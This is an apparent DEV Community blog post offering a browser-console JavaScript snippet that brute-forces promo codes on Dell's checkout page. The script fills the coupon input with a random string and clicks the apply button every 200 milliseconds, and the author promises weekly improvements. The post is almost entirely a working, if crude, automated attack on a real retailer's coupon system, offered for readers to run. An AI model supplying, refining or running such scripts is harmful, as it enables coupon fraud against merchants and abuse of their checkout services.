DEV Community

pawan deore
pawan deore

Posted on

2 1

Script to brute force Dell Promo code [in development]

go to https://www.dell.com

add something in the cart

open console paste the below script

press enter

let inp = document.querySelector("#appendedCouponInputButton")
let btn = document.querySelector("#applyCouponButton")
setInterval(function(){
let str = Math.round(Math.random()*99999999999998765876).toString(36);
    inp.value=str;
    btn.click();
},200)
Enter fullscreen mode Exit fullscreen mode

i know that we required to build much more our str i.e coupon is not strong. i will update on this script on every weekend, till then you can modify script.

Top comments (0)

AWS Q Developer image

Your AI Code Assistant

Generate and update README files, create data-flow diagrams, and keep your project fully documented. Built to handle large projects, Amazon Q Developer works alongside you from idea to production code.

Get started free in your IDE